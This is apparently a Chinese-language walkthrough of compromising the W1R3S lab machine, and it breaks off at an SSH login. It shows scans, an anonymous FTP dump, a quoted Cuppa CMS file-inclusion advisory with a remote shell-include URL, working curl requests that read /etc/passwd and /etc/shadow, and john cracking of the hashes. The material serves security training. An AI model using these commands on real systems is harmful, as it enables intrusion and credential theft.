1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
$ sudo nmap -sT --min-rate 10000 -p- 10.10.10.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-27 22:59 EDT
Nmap scan report for 10.10.10.130
Host is up (0.00059s latency).
Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:B8:7B:3D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 12.50 seconds
|
当前有 21,22,80,3306 四个端口。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
|
$ sudo nmap -sT -sV -sC -O -p21,22,80,3306 10.10.10.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-27 23:00 EDT
Nmap scan report for 10.10.10.130
Host is up (0.00041s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
|_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.10.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
| 256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
|_ 256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:B8:7B:3D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.9 (97%), Linux 5.1 (95%), Linux 4.10 (93%), Linux 3.4 - 3.10 (93%), Linux 3.10 (93%), Linux 3.13 - 3.16 (92%), Linux 4.4 (92%), Synology DiskStation Manager 5.2-5644 (92%), Linux 3.18 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.74 seconds
|
21 端口是 FTP 的 vsftpd 驻留程序,存在 Anonymous 权限访问。
22 端口是 OpenSSH 的 7.2p2 版本 Ubuntu Linux 操作系统。
80 端口是 Apache 的 httpd 驻留程序,版本是 2.4.18。
3306 端口是 MySQL。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
$ sudo nmap -sU --top-ports 20 10.10.10.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-27 23:02 EDT
Nmap scan report for 10.10.10.130
Host is up (0.00030s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
MAC Address: 00:0C:29:B8:7B:3D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds
|
都是 open|filtered 状态,没什么发现。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
$ sudo nmap --script=vuln -p21,22,80,3306 10.10.10.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-27 23:17 EDT
Nmap scan report for 10.10.10.130
Host is up (0.00041s latency).
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /wordpress/wp-login.php: Wordpress login page.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
3306/tcp open mysql
MAC Address: 00:0C:29:B8:7B:3D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 321.46 seconds
|
未找到 XSS、CSRF 可以利用的点。但是找到了一个 /wordpress/wp-login.php 。
探测出当前 Apache 可能存在 CVE-2007-6750(Apache HTTP Server 1.x 和 2.x 允许远程攻击者通过部分 HTTP 请求造成拒绝服务(守护进程中断)) 攻击。
根据以上内容收集的信息,初步选定操作顺序如下:
排查下:ftp 21、mysql 3306 这里的 ftp 有没有可能存在信息泄露,mysql 有没弱密码。
接着重点查看:web 80、ssh 22 这里的 80 端口是必须看的,很多攻击点就是 Web,ssh 一般没有价值,放到最后。
在 nmap 扫描阶段就提示了 FTP 有 anonymous 登录,登录进去看看。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
$ ftp 10.10.10.130
Connected to 10.10.10.130.
220 Welcome to W1R3S.inc FTP service.
Name (10.10.10.130:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
|
这里提示 Using binary mode to transfer files. 用二进制模式传输文件,在这里通过 binary 来切换到二进制模式。
1
2
|
ftp> binary
200 Switching to Binary mode.
|
查看文件 ls,在 content 文件夹内找到了三个文件,都把它下载下来。
1
2
3
4
5
6
7
|
ftp> ls
229 Entering Extended Passive Mode (|||47557|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 29 Jan 23 2018 01.txt
-rw-r--r-- 1 ftp ftp 165 Jan 23 2018 02.txt
-rw-r--r-- 1 ftp ftp 582 Jan 23 2018 03.txt
226 Directory send OK.
|
先执行一个 prompt 把交互模式给关掉(这样下载文件就不会每次都找我确定了)。接着使用 mget 命令下载多个文件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
ftp> prompt
Interactive mode off.
ftp> mget *.txt
local: 01.txt remote: 01.txt
229 Entering Extended Passive Mode (|||49066|)
150 Opening BINARY mode data connection for 01.txt (29 bytes).
100% |**************************************************************************************************| 29 7.51 KiB/s 00:00 ETA
226 Transfer complete.
29 bytes received in 00:00 (6.48 KiB/s)
local: 02.txt remote: 02.txt
229 Entering Extended Passive Mode (|||49316|)
150 Opening BINARY mode data connection for 02.txt (165 bytes).
100% |**************************************************************************************************| 165 302.88 KiB/s 00:00 ETA
226 Transfer complete.
165 bytes received in 00:00 (155.53 KiB/s)
local: 03.txt remote: 03.txt
229 Entering Extended Passive Mode (|||49684|)
150 Opening BINARY mode data connection for 03.txt (582 bytes).
100% |**************************************************************************************************| 582 1.77 MiB/s 00:00 ETA
226 Transfer complete.
582 bytes received in 00:00 (702.54 KiB/s)
|
docs 文件夹里面也有一个文件,使用 get 下载下来。
1
2
3
4
5
6
7
8
9
10
11
12
13
|
ftp> ls
229 Entering Extended Passive Mode (|||40355|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 138 Jan 23 2018 worktodo.txt
226 Directory send OK.
ftp> get worktodo.txt
local: worktodo.txt remote: worktodo.txt
229 Entering Extended Passive Mode (|||45620|)
150 Opening BINARY mode data connection for worktodo.txt (138 bytes).
100% |**************************************************************************************************| 138 21.21 KiB/s 00:00 ETA
226 Transfer complete.
138 bytes received in 00:00 (19.41 KiB/s)
|
new-employees 文件夹里面的同理。接着使用 quit 退出 ftp,然后 cat 查看文件内容。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
|
$ cat *.txt
New FTP Server For W1R3S.inc
#
#
#
#
#
#
#
#
01ec2d8fc11c493b25029fb1f47f39ce
#
#
#
#
#
#
#
#
#
#
#
#
#
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
############################################
___________.__ __ __ ______________________ _________ .__
\__ ___/| |__ ____ / \ / \/_ \______ \_____ \ / _____/ |__| ____ ____
| | | | \_/ __ \ \ \/\/ / | || _/ _(__ < \_____ \ | |/ \_/ ___\
| | | Y \ ___/ \ / | || | \/ \/ \ | | | \ \___
|____| |___| /\___ > \__/\ / |___||____|_ /______ /_______ / /\ |__|___| /\___ >
\/ \/ \/ \/ \/ \/ \/ \/ \/
The W1R3S.inc employee list
Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources
ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡
....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
|
通过 hash-identifier 工具和人工猜测:
(MD5)01ec2d8fc11c493b25029fb1f47f39ce
(Base64)SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
md5 john 看看:
1
2
|
echo '01ec2d8fc11c493b25029fb1f47f39ce' > md5.bash
john md5.bash
|
时间太慢,借助互联网的力量看看,Hashes Decrypt hash 返回结果为:
01ec2d8fc11c493b25029fb1f47f39ce: This is not a password
验证一下看看是否正确:
1
2
3
|
$ echo -n 'This is not a password' | md5sum
01ec2d8fc11c493b25029fb1f47f39ce -
|
接着看看这个 base64 的字符串:SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
base64 的特征:base64 除了数字和大小写字母,剩下的特殊符号只有 3 个。
base64 的辨别方法:
1)看特殊字符,或者说是正则规则匹配(+ / = 0-9 a-z A-Z)
2) = 只在文末出现,最多 2 个,原因是补足。
3)一些特殊情况,稍微复杂一点。主要是针对短字符串,首先 base64 的字符串一定能被 4 整数。 比如 root 可以被 4 整除,但它其实并不是 base64 编码,因为解码之后的 ascii 码不在 32-126 之间,会有乱码。所以这里的主要判断方法还是解码看有没有乱码。 这里还有一个特例,就是长度为 1 的非 base64 的字符串解码是空。
base64 主要功能是把 3 字节的二进制数据编码成 4 字节的文本数据,这样编码的好处是可以直接在邮件或者网页里面展示。
上面说的补足就是补位的意思,把长度不足 3 位倍数的数据填补到 3n 的长度,解码的时候会自动去掉。
+ 在 url 里面也是特殊的。
1
2
3
|
$ echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d
It is easy, but not that easy..
|
接着看看泄露出来的用户表:
1
2
3
4
5
6
7
8
|
The W1R3S.inc employee list (W1R3S.inc 员工名单)
Naomi.W - Manager (经理)
Hector.A - IT Dept (IT 部门)
Joseph.G - Web Design (网页设计)
Albert.O - Web Design (网页设计)
Gina.L - Inventory (库管)
Rico.D - Human Resources(人力资源部)
|
在看看这个上下翻转、前后倒序的字符串,kali 中有个 rev 命令可以解决前后倒序的反转,但是上下的没办法解决,借助互联网的工具吧,使用 Google 搜索描述准确即可。
1
2
|
flip reverse upside-down text
翻转 颠倒 上下颠倒的 文本
|
找到了一个 upsidedowntext 网站,可以解决这个问题。
1
2
3
|
ı don't thınk thıs ıs the way to root!
we have a ןot of work to do‘ stop pןayıng around˙˙˙˙
|
大概意思就是说别瞎玩了,我们还有很多事要做。
FTP 就到此为止了。
尝试连接 3306,因为是 Ubuntu,猜测用户名是 root,会有空密码的情况吗?
1
2
3
|
$ mysql -h 10.10.10.130 -u root -p
Enter password:
ERROR 1130 (HY000): Host '10.10.10.128' is not allowed to connect to this MySQL server
|
这里的提示信息是本机无法连接到 MySQL server。
也没有什么信息,3306 暂时放弃了。
首页是 Apache2 的默认界面。
进入/wordpress/wp-login.php 发现了要账号登陆。
源代码也没什么发现,试试目录爆破吧。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
$ sudo gobuster dir -u http://10.10.10.130 --wordlist=/usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.130
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 316] [--> http://10.10.10.130/wordpress/]
/javascript (Status: 301) [Size: 317] [--> http://10.10.10.130/javascript/]
/administrator (Status: 301) [Size: 320] [--> http://10.10.10.130/administrator/]
/server-status (Status: 403) [Size: 300]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================
|
根据以上内容,目前暴露出来的有 wordpress,还有个 CMS:
1
2
3
4
|
# wordpress
http://10.10.10.130/wordpress/
# cms
http://10.10.10.130/administrator/
|
administrator很明显这是一套 CMS 的安装界面引导,尝试一下这里有没有突破口。
这里暴露了这是一个 Cuppa CMS 默认账号密码都是:admin,随便填写一些信息看看可否下一步。
在用户创建时失败了,搜索一下 Cuppa CMS 有什么暴露出来的漏洞可以利用的。
1
2
3
4
5
6
7
8
|
$ searchsploit cuppa
------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
|
搜索结果出来了一个,File Inclusion 文件包含,查看一下具体位置信息。
1
2
3
4
5
6
7
8
9
10
|
$ searchsploit cuppa -m 25971.txt
[!] Could not find EDB-ID #
Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
URL: https://www.exploit-db.com/exploits/25971
Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
Codes: OSVDB-94101
Verified: True
File Type: C++ source, ASCII text, with very long lines (876)
Copied to: /home/kali/25971.txt
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
|
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------
Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------
Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "Db@dmin";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
-----------------------------------------------------------------------------
Able to read sensitive information via File Inclusion (PHP Stream)
################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
|
从文件中可以找到:
源代码位置在:http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
出现文件包含的位置在 /alerts/alertConfigField.php 的第二十二行:
1
|
<?php include($_REQUEST["urlConfig"]); ?>
|
EXPLOIT 利用方法:
1
2
3
|
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
|
通过拼接 URL 找到了,尝试一下:
1
|
http://10.10.10.130/administrator/alerts/alertConfigField.php
|
拼接一下参数试试:
1
2
3
|
http://10.10.10.130/administrator/alerts/alertConfigField.php
?urlConfig=../../../../../../../../../etc/passwd
?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
|
结果和上面一样,但是没有回显。
奇怪,按道理来说被修复了的话是不会出现这个窗口的,可是没有修复的情况下又没有回显,代码审计看看吧。
1
2
|
# 下载 cuppa_cms.zip 源码包
$ wget http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
|
使用 vim 检查 alerts/alertConfigField.php 文件
1
|
$ vim alerts/alertConfigField.php
|
1
2
3
4
5
6
7
8
9
|
<div class="alert_config_field" id="alert">
<div class="alert_config_top">
<strong><?php echo $language->fields_configuration ?></strong>: <?php echo @$cuppa->POST("field"); ?>
<div class="btnClose_alert" id="btnClose_alert" onclick="CloseDefaultAlert()"></div>
</div>
<div id="content_alert_config" class="content_alert_config">
<?php include "../components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?>
</div>
</div>
|
仔细看,这里的 urlConfig 变成通过 POST 的方式进行参数传递,且参数未校正,从而触发了这个文件包含漏洞。
使用 POST 的方式发个请求试试,在这里我使用 curl 的 --data-urlencode 参数来处理 POST 请求:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
|
$ curl --help all | grep url
Usage: curl [options...] <url>
--data-urlencode <data> HTTP POST data URL encoded
-q, --disable Disable .curlrc
--disallow-username-in-url Disallow username in URL
--doh-url <URL> Resolve host names over DoH
--libcurl <file> Dump libcurl equivalent code of this command line
--url <url> URL to work with
--url-query <data> Add a URL query part
$ curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://10.10.10.130/administrator/alerts/alertConfigField.php
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
|
这里的回显已 : 符号做为分隔符第二个参数都是 x 表明密码是以哈希的方式保存在 shadow 里面的,再次构造一次 POST:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
$ curl --data-urlencode 'urlConfig=../../../../../../../../../etc/shadow' http://10.10.10.130/administrator/alerts/alertConfigField.php
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::
|
然后将这些哈希拿下来进行破解:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
$ echo '''root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
''' > shadow.bash
$ john shadow.bash
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
www-data (www-data)
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
computer (w1r3s)
Proceeding with incremental:ASCII
|
john 已经破解出来了两个账号,root 破解时间太长了,试试直接登录 w1r3s 这个账号试试看。
1
2
3
4
5
6
7
8
|
$ ssh -lw1r3s 10.10.10.130 /bin/bash
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
[email protected] password:
^C
|
隐秘登录失败,正常登录有回显。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
$ ssh [email protected]
----------------------
Think this is the way?
----------------------
